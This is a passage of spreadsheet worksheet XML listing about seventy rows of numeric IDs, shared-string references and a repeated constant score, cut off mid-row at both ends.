        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26674" ht="15.75" customHeight="1">
      <c r="A26674" s="1">
        <v>4755.0</v>
      </c>
      <c r="B26674" s="2">
        <v>4.3397495E7</v>
      </c>
      <c r="C26674" s="2" t="s">
        <v>25646</v>
      </c>
      <c r="D26674" s="2">
        <v>1.0</v>
      </c>
      <c r="E26674" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26674" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26675" ht="15.75" customHeight="1">
      <c r="A26675" s="1">
        <v>4833.0</v>
      </c>
      <c r="B26675" s="2">
        <v>4.3663656E7</v>
      </c>
      <c r="C26675" s="2" t="s">
        <v>25647</v>
      </c>
      <c r="D26675" s="2">
        <v>1.0</v>
      </c>
      <c r="E26675" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26675" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26676" ht="15.75" customHeight="1">
      <c r="A26676" s="1">
        <v>4879.0</v>
      </c>
      <c r="B26676" s="2">
        <v>4.3851774E7</v>
      </c>
      <c r="C26676" s="2" t="s">
        <v>25648</v>
      </c>
      <c r="D26676" s="2">
        <v>1.0</v>
      </c>
      <c r="E26676" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26676" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26677" ht="15.75" customHeight="1">
      <c r="A26677" s="1">
        <v>5456.0</v>
      </c>
      <c r="B26677" s="2">
        <v>4.5659874E7</v>
      </c>
      <c r="C26677" s="2" t="s">
        <v>25649</v>
      </c>
      <c r="D26677" s="2">
        <v>1.0</v>
      </c>
      <c r="E26677" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26677" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26678" ht="15.75" customHeight="1">
      <c r="A26678" s="1">
        <v>5553.0</v>
      </c>
      <c r="B26678" s="2">
        <v>4.5947352E7</v>
      </c>
      <c r="C26678" s="2" t="s">
        <v>25650</v>
      </c>
      <c r="D26678" s="2">
        <v>1.0</v>
      </c>
      <c r="E26678" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26678" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26679" ht="15.75" customHeight="1">
      <c r="A26679" s="1">
        <v>5803.0</v>
      </c>
      <c r="B26679" s="2">
        <v>4.6789316E7</v>
      </c>
      <c r="C26679" s="2" t="s">
        <v>25651</v>
      </c>
      <c r="D26679" s="2">
        <v>1.0</v>
      </c>
      <c r="E26679" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26679" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26680" ht="15.75" customHeight="1">
      <c r="A26680" s="1">
        <v>5892.0</v>
      </c>
      <c r="B26680" s="2">
        <v>4.7095927E7</v>
      </c>
      <c r="C26680" s="2" t="s">
        <v>25652</v>
      </c>
      <c r="D26680" s="2">
        <v>1.0</v>
      </c>
      <c r="E26680" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26680" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26681" ht="15.75" customHeight="1">
      <c r="A26681" s="1">
        <v>5939.0</v>
      </c>
      <c r="B26681" s="2">
        <v>4.7277072E7</v>
      </c>
      <c r="C26681" s="2" t="s">
        <v>25653</v>
      </c>
      <c r="D26681" s="2">
        <v>1.0</v>
      </c>
      <c r="E26681" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26681" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26682" ht="15.75" customHeight="1">
      <c r="A26682" s="1">
        <v>6736.0</v>
      </c>
      <c r="B26682" s="2">
        <v>4.934675E7</v>
      </c>
      <c r="C26682" s="2" t="s">
        <v>25654</v>
      </c>
      <c r="D26682" s="2">
        <v>1.0</v>
      </c>
      <c r="E26682" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26682" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26683" ht="15.75" customHeight="1">
      <c r="A26683" s="1">
        <v>7076.0</v>
      </c>
      <c r="B26683" s="2">
        <v>5.0251234E7</v>
      </c>
      <c r="C26683" s="2" t="s">
        <v>25655</v>
      </c>
      <c r="D26683" s="2">
        <v>1.0</v>
      </c>
      <c r="E26683" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26683" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26684" ht="15.75" customHeight="1">
      <c r="A26684" s="1">
        <v>7765.0</v>
      </c>
      <c r="B26684" s="2">
        <v>5.2106134E7</v>
      </c>
      <c r="C26684" s="2" t="s">
        <v>25656</v>
      </c>
      <c r="D26684" s="2">
        <v>1.0</v>
      </c>
      <c r="E26684" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26684" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26685" ht="15.75" customHeight="1">
      <c r="A26685" s="1">
        <v>7948.0</v>
      </c>
      <c r="B26685" s="2">
        <v>5.263501E7</v>
      </c>
      <c r="C26685" s="2" t="s">
        <v>25657</v>
      </c>
      <c r="D26685" s="2">
        <v>1.0</v>
      </c>
      <c r="E26685" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26685" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26686" ht="15.75" customHeight="1">
      <c r="A26686" s="1">
        <v>8771.0</v>
      </c>
      <c r="B26686" s="2">
        <v>5.4583818E7</v>
      </c>
      <c r="C26686" s="2" t="s">
        <v>25658</v>
      </c>
      <c r="D26686" s="2">
        <v>1.0</v>
      </c>
      <c r="E26686" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26686" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26687" ht="15.75" customHeight="1">
      <c r="A26687" s="1">
        <v>8772.0</v>
      </c>
      <c r="B26687" s="2">
        <v>5.4583818E7</v>
      </c>
      <c r="C26687" s="2" t="s">
        <v>25659</v>
      </c>
      <c r="D26687" s="2">
        <v>1.0</v>
      </c>
      <c r="E26687" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26687" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26688" ht="15.75" customHeight="1">
      <c r="A26688" s="1">
        <v>9557.0</v>
      </c>
      <c r="B26688" s="2">
        <v>5.604206E7</v>
      </c>
      <c r="C26688" s="2" t="s">
        <v>25660</v>
      </c>
      <c r="D26688" s="2">
        <v>1.0</v>
      </c>
      <c r="E26688" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26688" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26689" ht="15.75" customHeight="1">
      <c r="A26689" s="1">
        <v>10266.0</v>
      </c>
      <c r="B26689" s="2">
        <v>5.7583409E7</v>
      </c>
      <c r="C26689" s="2" t="s">
        <v>25661</v>
      </c>
      <c r="D26689" s="2">
        <v>1.0</v>
      </c>
      <c r="E26689" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26689" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26690" ht="15.75" customHeight="1">
      <c r="A26690" s="1">
        <v>10770.0</v>
      </c>
      <c r="B26690" s="2">
        <v>1.5604661E7</v>
      </c>
      <c r="C26690" s="2" t="s">
        <v>25662</v>
      </c>
      <c r="D26690" s="2">
        <v>1.0</v>
      </c>
      <c r="E26690" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26690" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26691" ht="15.75" customHeight="1">
      <c r="A26691" s="1">
        <v>10929.0</v>
      </c>
      <c r="B26691" s="2">
        <v>1.6876929E7</v>
      </c>
      <c r="C26691" s="2" t="s">
        <v>25663</v>
      </c>
      <c r="D26691" s="2">
        <v>1.0</v>
      </c>
      <c r="E26691" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26691" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26692" ht="15.75" customHeight="1">
      <c r="A26692" s="1">
        <v>11469.0</v>
      </c>
      <c r="B26692" s="2">
        <v>2.195849E7</v>
      </c>
      <c r="C26692" s="2" t="s">
        <v>25664</v>
      </c>
      <c r="D26692" s="2">
        <v>1.0</v>
      </c>
      <c r="E26692" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26692" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26693" ht="15.75" customHeight="1">
      <c r="A26693" s="1">
        <v>11510.0</v>
      </c>
      <c r="B26693" s="2">
        <v>2.2187382E7</v>
      </c>
      <c r="C26693" s="2" t="s">
        <v>25665</v>
      </c>
      <c r="D26693" s="2">
        <v>1.0</v>
      </c>
      <c r="E26693" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26693" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26694" ht="15.75" customHeight="1">
      <c r="A26694" s="1">
        <v>11568.0</v>
      </c>
      <c r="B26694" s="2">
        <v>2.2760321E7</v>
      </c>
      <c r="C26694" s="2" t="s">
        <v>25666</v>
      </c>
      <c r="D26694" s="2">
        <v>1.0</v>
      </c>
      <c r="E26694" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26694" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26695" ht="15.75" customHeight="1">
      <c r="A26695" s="1">
        <v>12036.0</v>
      </c>
      <c r="B26695" s="2">
        <v>2.6281243E7</v>
      </c>
      <c r="C26695" s="2" t="s">
        <v>25667</v>
      </c>
      <c r="D26695" s="2">
        <v>1.0</v>
      </c>
      <c r="E26695" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26695" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26696" ht="15.75" customHeight="1">
      <c r="A26696" s="1">
        <v>12167.0</v>
      </c>
      <c r="B26696" s="2">
        <v>2.7369475E7</v>
      </c>
      <c r="C26696" s="2" t="s">
        <v>25668</v>
      </c>
      <c r="D26696" s="2">
        <v>1.0</v>
      </c>
      <c r="E26696" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26696" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26697" ht="15.75" customHeight="1">
      <c r="A26697" s="1">
        <v>12549.0</v>
      </c>
      <c r="B26697" s="2">
        <v>2.9869406E7</v>
      </c>
      <c r="C26697" s="2" t="s">
        <v>25669</v>
      </c>
      <c r="D26697" s="2">
        <v>1.0</v>
      </c>
      <c r="E26697" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26697" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26698" ht="15.75" customHeight="1">
      <c r="A26698" s="1">
        <v>13092.0</v>
      </c>
      <c r="B26698" s="2">
        <v>3.3452394E7</v>
      </c>
      <c r="C26698" s="2" t="s">
        <v>25670</v>
      </c>
      <c r="D26698" s="2">
        <v>1.0</v>
      </c>
      <c r="E26698" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26698" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26699" ht="15.75" customHeight="1">
      <c r="A26699" s="1">
        <v>13109.0</v>
      </c>
      <c r="B26699" s="2">
        <v>3.3567485E7</v>
      </c>
      <c r="C26699" s="2" t="s">
        <v>25671</v>
      </c>
      <c r="D26699" s="2">
        <v>1.0</v>
      </c>
      <c r="E26699" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26699" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26700" ht="15.75" customHeight="1">
      <c r="A26700" s="1">
        <v>13123.0</v>
      </c>
      <c r="B26700" s="2">
        <v>3.3629816E7</v>
      </c>
      <c r="C26700" s="2" t="s">
        <v>25672</v>
      </c>
      <c r="D26700" s="2">
        <v>1.0</v>
      </c>
      <c r="E26700" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26700" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26701" ht="15.75" customHeight="1">
      <c r="A26701" s="1">
        <v>13582.0</v>
      </c>
      <c r="B26701" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C26701" s="2" t="s">
        <v>25673</v>
      </c>
      <c r="D26701" s="2">
        <v>1.0</v>
      </c>
      <c r="E26701" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26701" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26702" ht="15.75" customHeight="1">
      <c r="A26702" s="1">
        <v>13667.0</v>
      </c>
      <c r="B26702" s="2">
        <v>3.6013043E7</v>
      </c>
      <c r="C26702" s="2" t="s">
        <v>25674</v>
      </c>
      <c r="D26702" s="2">
        <v>1.0</v>
      </c>
      <c r="E26702" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26702" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26703" ht="15.75" customHeight="1">
      <c r="A26703" s="1">
        <v>14788.0</v>
      </c>
      <c r="B26703" s="2">
        <v>4.0918163E7</v>
      </c>
      <c r="C26703" s="2" t="s">
        <v>25675</v>
      </c>
      <c r="D26703" s="2">
        <v>1.0</v>
      </c>
      <c r="E26703" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26703" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26704" ht="15.75" customHeight="1">
      <c r="A26704" s="1">
        <v>16215.0</v>
      </c>
      <c r="B26704" s="2">
        <v>4.5707105E7</v>
      </c>
      <c r="C26704" s="2" t="s">
        <v>25676</v>
      </c>
      <c r="D26704" s="2">
        <v>1.0</v>
      </c>
      <c r="E26704" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26704" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26705" ht="15.75" customHeight="1">
      <c r="A26705" s="1">
        <v>16630.0</v>
      </c>
      <c r="B26705" s="2">
        <v>4.7099203E7</v>
      </c>
      <c r="C26705" s="2" t="s">
        <v>25677</v>
      </c>
      <c r="D26705" s="2">
        <v>1.0</v>
      </c>
      <c r="E26705" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26705" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26706" ht="15.75" customHeight="1">
      <c r="A26706" s="1">
        <v>16732.0</v>
      </c>
      <c r="B26706" s="2">
        <v>4.7513877E7</v>
      </c>
      <c r="C26706" s="2" t="s">
        <v>25678</v>
      </c>
      <c r="D26706" s="2">
        <v>1.0</v>
      </c>
      <c r="E26706" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26706" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26707" ht="15.75" customHeight="1">
      <c r="A26707" s="1">
        <v>17632.0</v>
      </c>
      <c r="B26707" s="2">
        <v>5.0389556E7</v>
      </c>
      <c r="C26707" s="2" t="s">
        <v>25679</v>
      </c>
      <c r="D26707" s="2">
        <v>1.0</v>
      </c>
      <c r="E26707" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26707" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26708" ht="15.75" customHeight="1">
      <c r="A26708" s="1">
        <v>17871.0</v>
      </c>
      <c r="B26708" s="2">
        <v>5102684.0</v>
      </c>
      <c r="C26708" s="2" t="s">
        <v>25680</v>
      </c>
      <c r="D26708" s="2">
        <v>1.0</v>
      </c>
      <c r="E26708" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26708" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26709" ht="15.75" customHeight="1">
      <c r="A26709" s="1">
        <v>18548.0</v>
      </c>
      <c r="B26709" s="2">
        <v>5.3124668E7</v>
      </c>
      <c r="C26709" s="2" t="s">
        <v>25681</v>
      </c>
      <c r="D26709" s="2">
        <v>1.0</v>
      </c>
      <c r="E26709" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26709" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26710" ht="15.75" customHeight="1">
      <c r="A26710" s="1">
        <v>19231.0</v>
      </c>
      <c r="B26710" s="2">
        <v>5.5062764E7</v>
      </c>
      <c r="C26710" s="2" t="s">
        <v>25682</v>
      </c>
      <c r="D26710" s="2">
        <v>1.0</v>
      </c>
      <c r="E26710" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26710" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26711" ht="15.75" customHeight="1">
      <c r="A26711" s="1">
        <v>19413.0</v>
      </c>
      <c r="B26711" s="2">
        <v>5.5618497E7</v>
      </c>
      <c r="C26711" s="2" t="s">
        <v>25683</v>
      </c>
      <c r="D26711" s="2">
        <v>1.0</v>
      </c>
      <c r="E26711" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26711" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26712" ht="15.75" customHeight="1">
      <c r="A26712" s="1">
        <v>20073.0</v>
      </c>
      <c r="B26712" s="2">
        <v>891707.0</v>
      </c>
      <c r="C26712" s="2" t="s">
        <v>25684</v>
      </c>
      <c r="D26712" s="2">
        <v>1.0</v>
      </c>
      <c r="E26712" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26712" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26713" ht="15.75" customHeight="1">
      <c r="A26713" s="1">
        <v>20210.0</v>
      </c>
      <c r="B26713" s="2">
        <v>1.0671859E7</v>
      </c>
      <c r="C26713" s="2" t="s">
        <v>25685</v>
      </c>
      <c r="D26713" s="2">
        <v>1.0</v>
      </c>
      <c r="E26713" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26713" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26714" ht="15.75" customHeight="1">
      <c r="A26714" s="1">
        <v>20240.0</v>
      </c>
      <c r="B26714" s="2">
        <v>1.0870421E7</v>
      </c>
      <c r="C26714" s="2" t="s">
        <v>25686</v>
      </c>
      <c r="D26714" s="2">
        <v>1.0</v>
      </c>
      <c r="E26714" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26714" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26715" ht="15.75" customHeight="1">
      <c r="A26715" s="1">
        <v>20367.0</v>
      </c>
      <c r="B26715" s="2">
        <v>1.1784319E7</v>
      </c>
      <c r="C26715" s="2" t="s">
        <v>25687</v>
      </c>
      <c r="D26715" s="2">
        <v>1.0</v>
      </c>
      <c r="E26715" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26715" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26716" ht="15.75" customHeight="1">
      <c r="A26716" s="1">
        <v>20451.0</v>
      </c>
      <c r="B26716" s="2">
        <v>1.2513726E7</v>
      </c>
      <c r="C26716" s="2" t="s">
        <v>25688</v>
      </c>
      <c r="D26716" s="2">
        <v>1.0</v>
      </c>
      <c r="E26716" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26716" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26717" ht="15.75" customHeight="1">
      <c r="A26717" s="1">
        <v>20541.0</v>
      </c>
      <c r="B26717" s="2">
        <v>1.3343311E7</v>
      </c>
      <c r="C26717" s="2" t="s">
        <v>25689</v>
      </c>
      <c r="D26717" s="2">
        <v>1.0</v>
      </c>
      <c r="E26717" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26717" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26718" ht="15.75" customHeight="1">
      <c r="A26718" s="1">
        <v>20890.0</v>
      </c>
      <c r="B26718" s="2">
        <v>1.6153139E7</v>
      </c>
      <c r="C26718" s="2" t="s">
        <v>25690</v>
      </c>
      <c r="D26718" s="2">
        <v>1.0</v>
      </c>
      <c r="E26718" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26718" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26719" ht="15.75" customHeight="1">
      <c r="A26719" s="1">
        <v>21048.0</v>
      </c>
      <c r="B26719" s="2">
        <v>1.7705014E7</v>
      </c>
      <c r="C26719" s="2" t="s">
        <v>25691</v>
      </c>
      <c r="D26719" s="2">
        <v>1.0</v>
      </c>
      <c r="E26719" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26719" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26720" ht="15.75" customHeight="1">
      <c r="A26720" s="1">
        <v>21755.0</v>
      </c>
      <c r="B26720" s="2">
        <v>2.6062576E7</v>
      </c>
      <c r="C26720" s="2" t="s">
        <v>25692</v>
      </c>
      <c r="D26720" s="2">
        <v>1.0</v>
      </c>
      <c r="E26720" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26720" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26721" ht="15.75" customHeight="1">
      <c r="A26721" s="1">
        <v>21994.0</v>
      </c>
      <c r="B26721" s="2">
        <v>2.9524789E7</v>
      </c>
      <c r="C26721" s="2" t="s">
        <v>25693</v>
      </c>
      <c r="D26721" s="2">
        <v>1.0</v>
      </c>
      <c r="E26721" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26721" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26722" ht="15.75" customHeight="1">
      <c r="A26722" s="1">
        <v>22120.0</v>
      </c>
      <c r="B26722" s="2">
        <v>3.0991389E7</v>
      </c>
      <c r="C26722" s="2" t="s">
        <v>25694</v>
      </c>
      <c r="D26722" s="2">
        <v>1.0</v>
      </c>
      <c r="E26722" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26722" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26723" ht="15.75" customHeight="1">
      <c r="A26723" s="1">
        <v>22180.0</v>
      </c>
      <c r="B26723" s="2">
        <v>3.1720745E7</v>
      </c>
      <c r="C26723" s="2" t="s">
        <v>25695</v>
      </c>
      <c r="D26723" s="2">
        <v>1.0</v>
      </c>
      <c r="E26723" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26723" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26724" ht="15.75" customHeight="1">
      <c r="A26724" s="1">
        <v>22371.0</v>
      </c>
      <c r="B26724" s="2">
        <v>3.5006536E7</v>
      </c>
      <c r="C26724" s="2" t="s">
        <v>25696</v>
      </c>
      <c r="D26724" s="2">
        <v>1.0</v>
      </c>
      <c r="E26724" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26724" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26725" ht="15.75" customHeight="1">
      <c r="A26725" s="1">
        <v>22493.0</v>
      </c>
      <c r="B26725" s="2">
        <v>3.7099917E7</v>
      </c>
      <c r="C26725" s="2" t="s">
        <v>25697</v>
      </c>
      <c r="D26725" s="2">
        <v>1.0</v>
      </c>
      <c r="E26725" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26725" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26726" ht="15.75" customHeight="1">
      <c r="A26726" s="1">
        <v>22542.0</v>
      </c>
      <c r="B26726" s="2">
        <v>3.8042796E7</v>
      </c>
      <c r="C26726" s="2" t="s">
        <v>25698</v>
      </c>
      <c r="D26726" s="2">
        <v>1.0</v>
      </c>
      <c r="E26726" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26726" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26727" ht="15.75" customHeight="1">
      <c r="A26727" s="1">
        <v>22978.0</v>
      </c>
      <c r="B26727" s="2">
        <v>4.9289771E7</v>
      </c>
      <c r="C26727" s="2" t="s">
        <v>25699</v>
      </c>
      <c r="D26727" s="2">
        <v>1.0</v>
      </c>
      <c r="E26727" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26727" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26728" ht="15.75" customHeight="1">
      <c r="A26728" s="1">
        <v>23016.0</v>
      </c>
      <c r="B26728" s="2">
        <v>4.9871649E7</v>
      </c>
      <c r="C26728" s="2" t="s">
        <v>25700</v>
      </c>
      <c r="D26728" s="2">
        <v>1.0</v>
      </c>
      <c r="E26728" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26728" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26729" ht="15.75" customHeight="1">
      <c r="A26729" s="1">
        <v>23185.0</v>
      </c>
      <c r="B26729" s="2">
        <v>5.2328561E7</v>
      </c>
      <c r="C26729" s="2" t="s">
        <v>25701</v>
      </c>
      <c r="D26729" s="2">
        <v>1.0</v>
      </c>
      <c r="E26729" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26729" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26730" ht="15.75" customHeight="1">
      <c r="A26730" s="1">
        <v>23337.0</v>
      </c>
      <c r="B26730" s="2">
        <v>5472521.0</v>
      </c>
      <c r="C26730" s="2" t="s">
        <v>25702</v>
      </c>
      <c r="D26730" s="2">
        <v>1.0</v>
      </c>
      <c r="E26730" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26730" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26731" ht="15.75" customHeight="1">
      <c r="A26731" s="1">
        <v>23420.0</v>
      </c>
      <c r="B26731" s="2">
        <v>5627573.0</v>
      </c>
      <c r="C26731" s="2" t="s">
        <v>25703</v>
      </c>
      <c r="D26731" s="2">
        <v>1.0</v>
      </c>
      <c r="E26731" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26731" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26732" ht="15.75" customHeight="1">
      <c r="A26732" s="1">
        <v>23429.0</v>
      </c>
      <c r="B26732" s="2">
        <v>5.6457248E7</v>
      </c>
      <c r="C26732" s="2" t="s">
        <v>25704</v>
      </c>
      <c r="D26732" s="2">
        <v>1.0</v>
      </c>
      <c r="E26732" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26732" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26733" ht="15.75" customHeight="1">
      <c r="A26733" s="1">
        <v>23720.0</v>
      </c>
      <c r="B26733" s="2">
        <v>7208870.0</v>
      </c>
      <c r="C26733" s="2" t="s">
        <v>25705</v>
      </c>
      <c r="D26733" s="2">
        <v>1.0</v>
      </c>
      <c r="E26733" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26733" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26734" ht="15.75" customHeight="1">
      <c r="A26734" s="1">
        <v>23933.0</v>
      </c>
      <c r="B26734" s="2">
        <v>8674954.0</v>
      </c>
      <c r="C26734" s="2" t="s">
        <v>25706</v>
      </c>
      <c r="D26734" s="2">
        <v>1.0</v>
      </c>
      <c r="E26734" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26734" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26735" ht="15.75" customHeight="1">
      <c r="A26735" s="1">
        <v>23984.0</v>
      </c>
      <c r="B26735" s="2">
        <v>9123343.0</v>
      </c>
      <c r="C26735" s="2" t="s">
        <v>25707</v>
      </c>
      <c r="D26735" s="2">
        <v>1.0</v>
      </c>
      <c r="E26735" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26735" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26736" ht="15.75" customHeight="1">
      <c r="A26736" s="1">
        <v>24036.0</v>
      </c>
      <c r="B26736" s="2">
        <v>9457953.0</v>
      </c>
      <c r="C26736" s="2" t="s">
        <v>25708</v>
      </c>
      <c r="D26736" s="2">
        <v>1.0</v>
      </c>
      <c r="E26736" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26736" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26737" ht="15.75" customHeight="1">
      <c r="A26737" s="1">
        <v>24117.0</v>
      </c>
      <c r="B26737" s="2">
        <v>1.0003651E7</v>
      </c>
      <c r="C26737" s="2" t="s">
        <v>25709</v>
      </c>
      <c r="D26737" s="2">
        <v>1.0</v>
      </c>
      <c r="E26737" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26737" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26738" ht="15.75" customHeight="1">
      <c r="A26738" s="1">
        <v>24122.0</v>
      </c>
      <c r="B26738" s="2">
        <v>1.0012419E7</v>
      </c>
      <c r="C26738" s="2" t="s">
        <v>25710</v>
      </c>
      <c r="D26738" s="2">
        <v>1.0</v>
      </c>
      <c r="E26738" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26738" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26739" ht="15.75" customHeight="1">
      <c r="A26739" s="1">
        <v>24144.0</v>
      </c>
      <c r="B26739" s="2">
        <v>1.0068012E7</v>
      </c>
      <c r="C26739" s="2" t="s">
        <v>25711</v>
      </c>
      <c r="D26739" s="2">
        <v>1.0</v>
      </c>
      <c r="E26739" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26739" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26740" ht="15.75" customHeight="1">
      <c r="A26740" s="1">
        <v>24228.0</v>
      </c>
      <c r="B26740" s="2">
        <v>1.045363E7</v>
      </c>
      <c r="C26740" s="2" t="s">
        <v>25712</v>
      </c>
      <c r="D26740" s="2">
        <v>1.0</v>
      </c>
      <c r="E26740" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26740" s="2">
